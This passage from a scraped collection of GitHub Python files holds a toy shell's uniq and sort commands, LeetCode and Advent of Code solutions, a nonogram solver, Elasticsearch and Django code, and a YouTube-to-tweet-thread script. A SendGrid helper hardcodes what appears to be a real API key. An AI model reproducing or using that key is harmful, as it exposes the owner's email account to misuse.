concPath = path + \"/**/\" + s\n files = glob.glob(concPath, recursive=True)\n if args[0] != \"-name\":\n for file in files:\n output.append(file + \"\\n\")\n elif args[0] == \"-name\":\n for file in files:\n output.append(\".\" + file[initPathLength:] + \"\\n\")\n\n return output\n\n\nclass Uniq(Application):\n \"\"\"\n Uniq implements the 'uniq' shell function\n It detects and deletes adjacent duplicate lines from an input file/stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n case = 0\n if len(args) == 2:\n if args[0] != \"-i\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n case = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n indexToRemove = []\n\n if case == 0:\n for i in range(0, len(contents) - 1):\n if contents[i] == contents[i + 1]:\n indexToRemove.append(i + 1)\n\n else:\n for i in range(0, len(contents) - 1):\n j = i\n while (\n (j + 1) < len(contents)\n and contents[j].lower() == contents[j + 1].lower()):\n if (j + 1) not in indexToRemove:\n indexToRemove.append(j + 1)\n j += 1\n\n indexToRemove.sort(reverse=True)\n\n for index in indexToRemove:\n contents.pop(index)\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n\n\n# TODO Implement sort from Robins branch\nclass Sort(Application):\n \"\"\"\n Sort implements the 'sort' shell function\n It sorts the contents of a file/stdin line by line\n Outputs results to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n rev = 0 # reverse order true/false\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n if len(args) == 2:\n if args[0] != \"-r\":\n self.raise_error(\n \"Wrong flags\",\n \"value\",\n output\n )\n return output\n else:\n rev = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n contents.sort()\n if rev == 1:\n contents = contents[::-1]\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n","repo_name":"charliebarber/shell","sub_path":"src/applications/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5895460681","text":"#!/usr/bin/python3\nimport sys\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\ncoords = [tuple(int(s.strip()) for s in l.strip().split(','))\n for l in sys.stdin.readlines()]\nxmax = max(x for x, y in coords)\nymax = max(y for x, y in coords)\nshape = (xmax + 1, ymax + 1)\nR = max(*shape)\n\ngrid = np.zeros(shape, dtype=int)\n# this can't be the easiest way to do this...\nindices = np.asarray(list(np.ndindex(grid.shape)))\ndist = cdist(indices, coords, metric='cityblock')\ncost = np.sum(dist, axis=1)\n\nprint(np.count_nonzero(cost < 10000))\n","repo_name":"acarapetis/advent-of-code-2018","sub_path":"problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24210589112","text":"from sys import stdin\n\n\ndef exe(x):\n cou = 0\n l = []\n while cou < int(x):\n y = stdin.readline()\n z = stdin.readline()\n total_len = 0\n rope_len = z.split()\n\n i = 0\n for _ in rope_len:\n rope_len[i] = int(rope_len[i])\n i += 1\n\n for q in rope_len:\n total_len += q\n total_len -= 2\n\n l.append(total_len + 2)\n cou += 1\n\n for r in l:\n print(r)\n\nc = stdin.readline()\nexe(c)\n","repo_name":"ppkavinda/HacKerRank","sub_path":"ropes.py","file_name":"ropes.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16059332472","text":"class Solution:\n def threeSumClosest(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n nums.sort()\n result = nums[0] + nums[1] + nums[2]\n\n for i in range(len(nums) - 2):\n j, k = i+1, len(nums) - 1\n while j < k:\n tmp_sum = nums[i] + nums[j] + nums[k]\n if tmp_sum == target:\n return tmp_sum\n\n if abs(tmp_sum - target) < abs(result - target):\n result = tmp_sum\n\n if tmp_sum < target:\n j += 1\n elif tmp_sum > target:\n k -= 1\n\n return result\n","repo_name":"alekfed/leetcode-solutions-python","sub_path":"0016.3sum-closest.py","file_name":"0016.3sum-closest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34137662993","text":"#\n# @lc app=leetcode id=313 lang=python3\n#\n# [313] Super Ugly Number\n#\n# https://leetcode.com/problems/super-ugly-number/description/\n#\n# algorithms\n# Medium (42.59%)\n# Total Accepted: 65.3K\n# Total Submissions: 153.3K\n# Testcase Example: '12\\n[2,7,13,19]'\n#\n# Write a program to find the nth super ugly number.\n# \n# Super ugly numbers are positive numbers whose all prime factors are in the\n# given prime list primes of size k.\n# \n# Example:\n# \n# \n# Input: n = 12, primes = [2,7,13,19]\n# Output: 32 \n# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first\n# 12 \n# super ugly numbers given primes = [2,7,13,19] of size 4.\n# \n# Note:\n# \n# \n# 1 is a super ugly number for any given primes.\n# The given numbers in primes are in ascending order.\n# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.\n# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.\n# \n# \n#\n\n\n\nimport bisect\nfrom queue import PriorityQueue\nfrom collections import defaultdict, Counter\nimport heapq\nimport math\nfrom operator import mul\nfrom functools import reduce\nfrom itertools import count\nfrom pprint import pprint\n# from functools import lru_cache\nclass Solution:\n # def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n l = [1]\n d = defaultdict(lambda: False)\n d[1] = True\n def recur(n):\n if n == 1:\n return 1\n else:\n last = recur(n-1)\n for p in primes:\n num = p*last\n if num > l[-1]:\n l.append(num)\n d[num] = True\n else:\n if not d[num]:\n bisect.insort_left(l, num)\n d[num] = True\n # break\n # print(l)\n return l[n-1]\n return recur(n)\n\n\n\n def nthSuperUglyNumber1(self, n: int, primes) -> int:\n\n pq = []\n d = defaultdict(lambda: False)\n heapq.heappush(pq, 1)\n d[1] = True\n for i in range(0, n):\n num = heapq.nsmallest(i+1, pq)[-1]\n for p in primes:\n r = p*num\n if not d[r]:\n # print(pq)\n heapq.heappush(pq, r)\n d[r] = True\n # print(sorted(pq))\n return heapq.nsmallest(n, pq)[-1]\n\n\n\n def nthSuperUglyNumber(self, n: int, primes) -> int:\n pq = []\n d = defaultdict(lambda: False)\n pq = [1]\n d[1] = True\n for i in range(0, n):\n for p in primes:\n r = p*pq[i]\n if not d[r]:\n if r > pq[-1]:\n pq.append(r)\n else:\n bisect.insort_left(pq, r)\n d[r] = True\n return pq[n-1]\n\n\n\n \n\n # for i in range(1,13):\n # print(next(hq2(i)))\n # print(next(hq2(12)))\n\n\n # return hq2(n)\n\n\n def nthSuperUglyNumber3(self, n: int, primes) -> int:\n base = primes[0]\n m = list(map(lambda x: math.log(x, base), primes))\n # print('m=', m)\n l = list(zip(m, range(len(primes))))\n template = []\n\n # pq = PriorityQueue()\n pq = []\n # heapq.heappush(pq, 1)\n\n\n for v,k in l:\n t = [0]*len(primes)\n t[k]=1\n template.append(t)\n heapq.heappush(pq, (v,t)) \n\n # print(template)\n\n\n\n def get_new_kv(l):\n # print('get_new_kv')\n i = -1\n me = values[i]\n k = ks[i]\n # print(values, me)\n # print(ks)\n temp = []\n while me + values[i-1]>me:\n temp.append((me + values[i-1],[a+b for a,b in zip(k, ks[i-1])]))\n i -= 1\n # print('temp=', temp)\n for v,k in temp:\n heapq.heappush(pq, (v,k))\n # print(sorted(pq))\n\n l = [1]\n c = 1\n values = [0]\n ks = []\n\n\n multiples_of_primes = []\n\n def add_to_multiples_of_primes(start):\n for i in range(len(m)):\n multiples_of_primes.append((start*m[i], [t*start for t in template[i]]))\n\n ct = count(2)\n # print(pq)\n while c < n:\n if pq:\n v, k = heapq.heappop(pq)\n else:\n # print('here', multiples_of_primes)\n v, k = multiples_of_primes.pop(0)\n\n\n temp_v = v\n\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n\n while multiples_of_primes[0][0] < temp_v:\n sv, sk = multiples_of_primes.pop(0)\n # print('here', sv, si)\n # print(len(multiples_of_primes))\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n values.append(sv)\n ks.append(sk)\n item = reduce(mul, (p**i for p, i in zip(primes, sk) if i != 0))\n l.append(item)\n c += 1\n get_new_kv(l)\n temp_v = sv\n if c == n:\n # print('here')\n break\n # print('l=', l,c)\n values.append(v)\n ks.append(k)\n item = reduce(mul, (p**i for p, i in zip(primes, k) if i != 0))\n if item > l[-1]:\n l.append(item)\n c += 1\n get_new_kv(l)\n # print('l=', l)\n return l[-1]\n\n\n\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n\n debug = False\n # debug = True\n\n\n table = [[0]*len(primes) for _ in range(n)]\n \n table[0] = [1]*len(primes)\n\n def fill(r, c): \n val = primes[c] * l[r-1]\n max_col[c] = val, r, c\n return val\n\n # pprint(table)\n c = 1\n \n max_col = list(zip(primes, [0]*len(primes), range(len(primes))))\n # print(max_col)\n l = [1]\n \n\n\n pq = PriorityQueue()\n\n for i, v in enumerate(primes):\n pq.put((v, i))\n\n\n\n # pq.put((0, primes[0]))\n\n\n\n mx = primes[0]\n cr, cl = 0, 0\n\n\n\n\n\n\n\n while c < n:\n # current row, current col\n\n \n \n mx, cl = pq.get()\n cr = max_col[cl][1]\n\n if debug:\n # print('max_col=', max_col)\n print('cr=', cr, 'cl=', cl, 'mx=', mx)\n # print(' pk=', pk, 'pv=', pv)\n\n\n if cl == 0:\n\n # if primes[cl] * table[cr][cl] <= mx:\n if primes[cl] * table[cr][cl] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * table[cr][cl], mx, primes[cl] * table[cr][cl] == mx)\n cr += 1\n table[cr][cl] = primes[cl] * table[cr-1][cl]\n max_col[cl] = table[cr][cl], cr, cl\n\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n\n\n else:\n\n if cl < len(primes)-1:\n \n # if primes[cl] * l[cr] <= mx:\n if primes[cl] * l[cr] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * l[cr], mx, primes[cl] * l[cr] == mx)\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n else:\n if debug:\n print('last column')\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug: print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n \n\n # if debug: pprint(table)\n\n if cl == 0:\n mx = max_col[cl][0] * primes[0]\n else:\n mx = primes[cl] * l[max_col[cl][1]]\n # print('mx=', mx, max_col[cl])\n\n pq.put((mx, cl))\n \n \n\n if debug:\n print(l,c)\n print(\"=\"*30)\n\n\n return l[-1]\n\n def nthSuperUglyNumber_final(self, n: int, primes) -> int:\n lp = len(primes)\n indices = [0]*lp\n l = [1]*n\n pq = list(zip(primes, range(lp)))\n heapq.heapify(pq)\n c, mx = 1, 1\n while c < n:\n val, i = heapq.heappop(pq)\n indices[i] += 1\n if val > mx:\n l[c] = val\n mx = val\n c += 1\n if i == 0:\n val *= primes[i]\n else:\n val = primes[i] * l[indices[i]]\n heapq.heappush(pq, (val, i))\n return l[-1]\n\ns = Solution()\n\n\nimport time\n\nstart = time.time()\n# print(\"hello\")\n\nn = 12\nprimes = [2,7,13,19]\nprint(s.nthSuperUglyNumber(n, primes)==32)\n\n\nn = 100000\n# n = 300\nprimes = [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]\na = s.nthSuperUglyNumber(n, primes)\nprint(a)\n# b = s.nthSuperUglyNumber2(n, primes)\n# print(a == 1092889481)\n# print(b)\n# print(a==b)\n\n\n\n\n\n\n# print()\nn = 35\nprimes = [2,3,11,13,17,23,29,31,37,47]\n# print(s.nthSuperUglyNumber(n, primes) == 62) # 62\n\n\n\nn = 4\nprimes = [2,3,5]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\nn = 3\nprimes = [2]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\n\nend = time.time()\nprint(end - start)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"nickyfoto/lc","sub_path":"python/313.super-ugly-number.py","file_name":"313.super-ugly-number.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24800562702","text":"import sys\ninput = sys.stdin.readline\n\n\nn = int(input())\nm = int(input())\na = list(map(int, input().split()))\nphoto = dict()\n\nfor i in range(m):\n\n if a[i] in photo:\n photo[a[i]][0] += 1\n else:\n if len(photo) == n:\n del photo[a[sorted(photo.values())[0][1]]]\n photo[a[i]] = [1, i]\n\nprint(' '.join(map(str, sorted(photo.keys()))))\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1713_후보 추천하기_220511.py","file_name":"1713_후보 추천하기_220511.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7778845259","text":"from functools import reduce, lru_cache\nfrom random import choice, shuffle, randrange, randint\nfrom collections import deque\nfrom queue import PriorityQueue\n#min of hamming distances between all 01 sentences with d-ones\n\nwith open(\"zad_input.txt\") as f:\n inp = [[int(c) for c in row.split(\" \") if c] for row in f.read().split(\"\\n\") if row]\n [K,M] = inp[0]\n rows = inp[1:K+1]\n columns = inp[-M:]\n\ndef transpose(matrix):\n return [[matrix[a][b] for a in range(len(matrix))] for b in range(len(matrix[0]))]\n\ndef generate_all(n,a):\n if n <= 0:\n if not a:\n return [[]]\n else:\n return []\n if not a:\n return [[0]*n]\n [a1, *at] = a\n return [[0]*i + [1]*a1 + ([0] if at else []) + other for i in range(0, n) for other in generate_all(n-a1-i-(1 if at else 0), at) if len([0]*i + [1]*a1 + ([0] if at else []) + other) == n]\n\ndef solve(row_values, column_values):\n\n def allowable(row):\n def _and_pixel(x,y):\n return x if x == y else 2\n return reduce(lambda a, b: [_and_pixel(x,y) for x, y in zip(a, b)], row)\n\n def show(m):\n return \"\\n\".join(\"\".join(\".#?\"[i] for i in x) for x in m)\n\n w, h = len(column_values), len(row_values)\n rows = [generate_all(w, x) for x in row_values]\n cols = [generate_all(h, x) for x in column_values]\n can_do = [allowable(row) for row in rows]\n\n def _can_fit(x,y):\n return x == y or x == 2 or y == 2\n\n def fits(a, b):\n return all(_can_fit(x,y) for x, y in zip(a, b))\n\n def fix_col(n):\n c = [x[n] for x in can_do]\n cols[n] = [x for x in cols[n] if fits(x, c)]\n for i, x in enumerate(allowable(cols[n])):\n if x != can_do[i][n]:\n fillable_rows.add(i)\n can_do[i][n] = x if _can_fit(x, can_do[i][n]) else 2\n\n def fix_row(n):\n c = can_do[n]\n rows[n] = [x for x in rows[n] if fits(x, c)]\n for i, x in enumerate(allowable(rows[n])):\n if x != can_do[n][i]:\n fillable_cols.add(i)\n can_do[n][i] = x if _can_fit(x, can_do[n][i]) else 2\n\n fillable_rows, fillable_cols = set(), set(range(w))\n\n while fillable_cols:\n for i in fillable_cols:\n fix_col(i)\n fillable_cols = set()\n for i in fillable_rows:\n fix_row(i)\n fillable_rows = set()\n\n return show(can_do)\n\n\ndef print_board(board):\n return \"\\n\".join([\"\".join(map(str,row)) for row in board])\n\nwith open(\"zad_output.txt\", mode='w') as f:\n f.write(solve(rows,columns))\n","repo_name":"wekt0r/uni","sub_path":"Sztuczna Inteligencja/p3/z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9372425379","text":"import requests\n\nAPI_KEY = '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'\n\ndef send(destination, subject, message):\n\n post = requests.post(\n \"https://api.sendgrid.com/v3/mail/send\",\n headers={\n \"Authorization\": \"Bearer \" + API_KEY,\n \"Content-Type\": \"application/json\"\n },\n json = {\n \"personalizations\": [ {\n \"to\": [ { \"email\": destination } ],\n \"subject\": subject\n } ],\n\n \"from\": {\n \"email\": \"rotafestival@gmail.com\",\n \"name\": \"ROTA - Festival de Roteiro Audiovisual\"\n },\n\n \"content\": [ {\n \"type\": \"text/html\",\n \"value\": message\n } ]\n }\n\n )\n\n","repo_name":"1um0zero/rota","sub_path":"src/core/sendgrid.py","file_name":"sendgrid.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20855462593","text":"from django.db import models\nfrom users.models import BaseUser\n\n# Create your models here.\n\n\n\nclass Message(models.Model):\n \"\"\" Class that is the framework for all messages that get registered into the database\n\n \"\"\"\n\n from_user = models.ForeignKey(BaseUser, null=True, related_name='creator')\n to_user = models.ForeignKey(BaseUser, null=True, related_name='receiver')\n subject_line = models.CharField(('Subject'), max_length=140, blank=True,)\n\n is_read = models.BooleanField(('Read'), default=False)\n\n body_text = models.CharField(('Body'), max_length=1000, blank=True,)\n\n def setAsRead(self):\n \"\"\" Flips the is_read boolean to determine if the message has been seen/read yet\n\n :return: n/a\n \"\"\"\n self.is_read = True","repo_name":"Gr34v0/DogeIncToolShare","sub_path":"messaging/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"69999824009","text":"import os\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom elasticsearch_config import es\nfrom elasticsearch.helpers import bulk\nfrom multiprocessing import Process, Manager\nimport time\n\nstart_time = time.time()\n\n# ---------- CREAR INDEX OG FIELD PRICES ----------\n\nog_mapp = es.indices.get_mapping(index=\"wells_coordinates_texas\")[\n \"wells_coordinates_texas\"\n]\n\nog_mapp[\"mappings\"][\"properties\"][\"geology_type\"] = {\n \"type\": \"text\",\n \"fields\": {\"keyword\": {\"type\": \"keyword\", \"ignore_above\": 256}},\n}\n\n\nes.indices.create(index=\"well_geology\", body=og_mapp, ignore=400)\n\n# ---------- IDENTIFICAR TIPO DE GEOLOGIA ----------\n\ngeology_index = \"tx_geol_poly\"\nwell = \"wells_coordinates_texas\"\nquery = {\"query\": {\"match_all\": {}}}\nindex_geology_hits = []\nwell_hits = []\n\n\ndef get_batch_data(index, data):\n res = es.search(index=index, body=query, size=10000, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n while len(hits) > 0:\n res = es.scroll(scroll_id=scroll_id, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n\ndef process_geology_hits():\n get_batch_data(geology_index, index_geology_hits)\n polygons = []\n\n for hit in index_geology_hits:\n coordinates = hit[\"geometry\"][\"coordinates\"][0]\n polygons.append(Polygon(coordinates))\n\n return polygons\n\n\ndef process_well_hit(well_hit, polygons, index_geology_hits, result):\n well_location = Point(*well_hit[\"geometry\"])\n for i, polygon in enumerate(polygons):\n if well_location.within(polygon):\n well_hit[\"geology_type\"] = index_geology_hits[i][\"GENERALIZE\"]\n result.append(well_hit)\n\n\ndef process_well_hits(well_hits, polygons, index_geology_hits, result):\n for well_hit in well_hits:\n process_well_hit(well_hit, polygons, index_geology_hits, result)\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n result = manager.list()\n\n get_batch_data(well, well_hits)\n polygons = process_geology_hits()\n\n chunk_size = max(len(well_hits) // 10, 1)\n processes = []\n\n for i in range(0, len(well_hits), chunk_size):\n process = Process(\n target=process_well_hits,\n args=(well_hits[i : i + chunk_size], polygons, index_geology_hits, result),\n )\n processes.append(process)\n process.start()\n\n for process in processes:\n process.join()\n\n def ingestion_bulk(index_name, batch_size=5000):\n data = [{\"_index\": index_name, \"_source\": doc} for doc in result]\n len_data = len(data)\n\n for i in range(0, len_data, batch_size):\n success, failed = bulk(es, data[i : i + batch_size])\n\n if failed:\n print(f\"Error al indexar {failed} documentos.\")\n else:\n print(f\"Se indexaron los documentos correctamente.\")\n\n ingestion_bulk(\"well_geology\")\n\n end_time = time.time()\n all_time = end_time - start_time\n\n print(f\"Tiempo de procesamiento: {float(all_time) / 60} minutos.\")\n","repo_name":"CristianERP/elastic","sub_path":"well_geology_parallel.py","file_name":"well_geology_parallel.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1620154821","text":"import openai\nimport pandas as pd\nfrom pytube import YouTube\nfrom transformers import T5Tokenizer\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom transformers import GPT2TokenizerFast\nfrom transformers import pipeline\nimport textwrap\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\nimport warnings\nimport yt_dlp\nimport os\n# Supress warnings\nlogging.basicConfig(level=logging.CRITICAL)\nwarnings.filterwarnings(\"ignore\")\n\n# OpenAI API key\nopenai.api_key = \"Your OpenAI API Key\"\n\ndef get_transcript(youtubelink):\n video_url = youtubelink\n\n # Create a yt-dlp instance\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': 'audio_file.mp3',\n 'noplaylist': True,\n }\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\n # Extract video information\n video_info = ydl.extract_info(video_url, download=False)\n # Download the audio\n ydl.download([video_url])\n\n audio_file = \"audio_file.mp3\"\n\n \n\n with open(audio_file, \"rb\") as audio:\n transcript = openai.Audio.translate(\"whisper-1\", audio)\n\n thetext = transcript['text']\n\n with open(\"full_transcript.txt\", \"w\") as file:\n file.write(thetext)\n\n # Remove the audio file after processing\n os.remove(audio_file)\n\n return thetext\n\n\n\ndef count_tokens(input_data, max_tokens=20000, input_type='text'):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n if input_type == 'text':\n tokens = tokenizer.tokenize(input_data)\n elif input_type == 'tokens':\n tokens = input_data\n else:\n raise ValueError(\"Invalid input_type. Must be 'text' or 'tokens'\")\n\n # Print the number of tokens\n token_count = len(tokens)\n return token_count\n\n\n\ndef truncate_text_by_tokens(text, max_tokens=3000):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n # Tokenize the input text\n tokens = tokenizer.tokenize(text)\n\n # Truncate tokens to final_max_tokens\n truncated_tokens = tokens[:max_tokens]\n\n trunc_token_len = count_tokens(truncated_tokens, input_type='tokens')\n\n print(\"Truncated Summary Token Length:\"+ str(trunc_token_len))\n\n # Convert the truncated tokens back to text\n truncated_text = tokenizer.convert_tokens_to_string(truncated_tokens)\n\n return truncated_text\n\n\n\ndef summarize_chunk(classifier, chunk):\n summary = classifier(chunk)\n return summary[0][\"summary_text\"]\n\n\n\ndef summarize_text(text, model_name=\"t5-small\", max_workers=8):\n classifier = pipeline(\"summarization\", model=model_name)\n summarized_text = \"\"\n\n # Split the input text into smaller chunks\n chunks = textwrap.wrap(text, width=500, break_long_words=False)\n\n # Parallelize the summarization of the chunks\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n summaries = executor.map(lambda chunk: summarize_chunk(classifier, chunk), chunks)\n summarized_text = \" \".join(summaries)\n text_len_in_tokens = count_tokens(text)\n print(\"Tokens in full transcript\" + str(text_len_in_tokens))\n summary_token_len = count_tokens(summarized_text)\n print(\"Summary Token Length:\"+ str(summary_token_len))\n\n if summary_token_len > 2500:\n summarized_text = truncate_text_by_tokens(summarized_text, max_tokens=2500)\n\n else:\n summarized_text = summarized_text\n\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summarized_text)\n\n\n print(\"summarized by t5\")\n return summarized_text.strip()\n\n\n\ndef gpt_summarize_transcript(transcript_text,token_len):\n # Check the length of the transcript\n \n # Generate the summary using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at summarizing long documents into concise and comprehensive summaries. Your summaries often capture the essence of the original text.\"},\n {\"role\": \"user\", \"content\": \"I have a long transcript that I would like you to summarize for me. Please think carefully and do the best job you possibly can.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a concise and comprehensive summary of the transcript.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text}\n ],\n max_tokens=3800 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated summary from the response\n summary = response['choices'][0]['message']['content']\n print(\"summarized by GPT3\")\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summary)\n\n\n # Return the summary\n return summary.strip()\n \n\n\ndef generate_tweet_thread(transcript_text):\n # Generate the tweets using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing tweet threads that are incredibly interesting and potentially newsworthy. You are known to go viral.\"},\n {\"role\": \"user\", \"content\": \"I have text that I would like you to use as the basis for coming up with multiple tweets for a long-form twitter thread. Please think step by step and do the best job you possibly can. Each tweet should be on a new line\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a list of tweets on new lines for easy parsing. This tweet thread should be written to go viral. I will make sure each tweet is less than 250 characters.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"My list will be formatted as: Tweet 1 \\n\\n Tweet 2 \\n\\n Tweet 3 \\n\\n etc.\"}\n\n ],\n max_tokens=900,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated tweets from the response\n tweets = response['choices'][0]['message']['content']\n print(tweets)\n\n # Split the tweets into separate parts\n tweets = tweets.split(\"\\n\\n\")\n print(tweets)\n\n # Create a dataframe from the tweets\n df = pd.DataFrame({\"tweet\": tweets})\n df.to_csv('Tweet_Thread.csv')\n\n # Return the tweets as a list\n return tweets\n\n\n\ndef generate_long_form_article(transcript_text,token_len):\n # Generate the article outline using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form article outlines that are informative, engaging, and well-researched. Your articles often go viral and are widely shared.\"},\n {\"role\": \"user\", \"content\": \"I have some text that I would like you to use as the basis for a long-form article outline. Please think carefully and do the best job you can to come up with an outline for the article.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-structured outline for the article based on the content. I will provide the result numbered with roman numerals \"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"Here are the sections without any start text, numbered by roman numerals\"}\n\n ],\n max_tokens=3700 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the article outline from the response\n outline = response['choices'][0]['message']['content']\n outline_token_count = count_tokens(outline)\n sections = outline.strip().split(\"\\n\\n\")\n parsed_data = []\n for section in sections:\n lines = section.strip().split(\"\\n\")\n section_title = lines[0].strip()\n section_items = [item.strip() for item in lines[1:]]\n parsed_data.append([section_title, section_items])\n \n with open(\"article_outline.txt\", \"w\") as file:\n file.write(str(parsed_data))\n\n\n\n generated_sections = []\n # Loop through each section in the outline\n for section in parsed_data:\n # Generate the section using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form articles that are informative, engaging, and well-researched. Your articles often go viral and are widely shared. You will be given an article outline for context, and instructions on which section of the outline to complete.\"},\n {\"role\": \"user\", \"content\": \"I have a section of an article that I would like you to write for me. Please think carefully and do the best job you can to come up with a well-written and comprehensive section. Please also take into consideration the article's outline so that you can write without overlapping pevious points and build on each section.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-written section based taking into consideration the outline. I will provide only the section text without any additional text\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the outline to use to understand your goal better: \" + outline + \" and the section to write: \" + str(section)}\n ],\n max_tokens=3700-outline_token_count,\n n=1,\n stop=None,\n temperature=0.2,\n )\n\n # Extract the generated section from the response\n generated_section = response['choices'][0]['message']['content']\n\n\n # Add the generated section to the list of generated 